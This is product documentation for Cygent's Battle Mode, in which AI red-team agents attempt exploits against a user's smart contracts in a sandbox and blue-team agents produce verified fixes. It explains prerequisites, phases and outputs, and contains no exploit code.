Battle Mode Overview

A red-team / blue-team sandbox that proves whether a finding is actually exploitable — and produces a verified fix PR.

Overview

Battle Mode is Cygent's most advanced feature. It answers a question every security team eventually has to answer in a high-stakes way: is this finding actually exploitable in a live environment, or is it just a theoretical pattern?

The approach is simple in concept: put your contracts in a sandbox, unleash AI attackers at them, let AI defenders patch what the attackers exploit, and produce a PR with only the fixes that actually stopped the attacks. No "we think this might matter" — only "we proved this was exploitable, and we proved the fix closes the door."

The core idea

Every audit produces findings. Findings have severity labels, reasoning, recommended fixes. But severity is a prediction. It's a model's best reasoning about how a bug might be exploited, based on the code. It is not a demonstration.

Battle Mode moves from prediction to demonstration:

Clone to sandbox

Clone your contracts into an isolated sandbox. Deploy with realistic state.

Red Team attacks

AI agents write real exploit transactions — not pseudo-code, actual calldata targeting your deployed contracts.

Blue Team patches

AI agents watch, then attempt fixes once exploits land. Each fix verified against the exact exploit.

Retest

Red Team returns with fresh exploits against the patched code. Only surviving fixes count.

Ship the PR

Surface results: Exploited findings, Defended fixes, and a PR containing only verified fixes.

What you get at the end is categorically different from an audit. An audit says "this looks wrong." Battle Mode says "we exploited it; here's the exploit; here's the fix; we proved the fix holds."

When to use Battle Mode

Battle Mode is heavy — it runs longer, costs more compute, and requires your repo to have working build and test commands — so use it deliberately.

Situation	Why Battle Mode fits
Pre-mainnet	The last gate before a deploy. Stress-test survival checkpoint.
Post-audit, before release	Validate that remediation actually worked — not just compiled.
Contested findings	A finding looks real to Cygent but your team thinks it's a false positive. Let the attacker try to land it.
After a major refactor	Confirm the refactor didn't introduce anything new that a scanner-style audit would miss.

It's not for every day. It's for moments when you need proof.

Requirements

Battle Mode is an opt-in experimental feature with a few non-trivial prerequisites:

ℹ️

Enable it: Go to the agent's Settings → Experimental section and toggle Battle Mode on. The Battle Mode tab appears once enabled.

Prerequisite	Detail
Completed CARA audit	Battle Mode uses the finding list as its attack surface hint
Working build and test	`forge build` and `forge test` must pass from a fresh clone (or your custom commands)
Sandbox environment	Local Anvil (fast, ephemeral) or BattleChain (dedicated test network)
Deployment inputs	A deployment script or the constructor args + initial state needed to deploy

⚠️

Only run Battle Mode on code you own or have explicit permission to test. The whole point is that the attacker agents genuinely try to exploit the deployed contracts. Pointing Battle Mode at someone else's protocol without authorization is, at minimum, bad manners and potentially illegal.

Red Team vs Blue Team

The agents split along the classic security-exercise line.

Red Team — the attackers

The Red Team's job is to break things. They read the code, pull in the CARA finding context, and generate exploit transactions. For each known finding they try to write a working PoC. Then, once they've exercised the known findings, they go hunting for new vulnerabilities — attack surfaces CARA missed, composite exploits that chain multiple contracts, edge cases in state transitions.

When a Red Team exploit succeeds — funds drained, state corrupted, admin privileges taken — that finding is marked Exploited. That's the proof.

Blue Team — the defenders

The Blue Team's job is to stop the exploits. Once a finding is Exploited, Blue Team agents take up to 3 attempts to patch it. Each patch is verified against the exact exploit the Red Team used — if the exploit no longer lands, the patch is a candidate fix.

The twist is the Retest phase. After Blue Team proposes a fix, Red Team comes back and tries to write a new exploit against the patched code. If Red Team can't find a new exploit that lands, the fix is marked Defended. If Red Team can bypass the fix, the fix is Bypassed and the finding stays open.

This is the critical mechanism. Any fix can look like it works against the original exploit. The question is whether the fix actually closes the class of bug or just the specific instance — and the only way to know is to let a fresh attacker try again.

The output

When Battle Mode finishes, you get:

Artifact	Contents
Scoreboard	Three counts — Exploited / Fixed / Bypassed — across all findings in scope
PR	Only the Defended fixes. Fixes that got Bypassed are left out
Per-finding detail	Exploit code, fix diff, retest outcome
CSV export	For audit trails and compliance requirements

See Reading Results for how to interpret the scoreboard.

Launching a battle

Enable the feature

Settings → Experimental → Battle Mode. Accept the risk acknowledgement.

Pick a target project

From the Battle Mode tab, select a project. Battle Mode only lists projects with a completed audit.

Configure the sandbox

Choose Local Anvil or BattleChain. Confirm your build/test commands. Provide deployment inputs if not already scripted.

Scope the battle

Optionally narrow scope to specific findings or contracts. Full-scope battles run longer but produce the most complete results.

Launch

Click Start Battle. Cygent spins up the sandbox, deploys your contracts, and begins the six-phase run.

Battles run asynchronously. You can leave the dashboard and come back — progress and results stream to the battle's page in real time.

See Battle Phases for the full phase-by-phase walkthrough.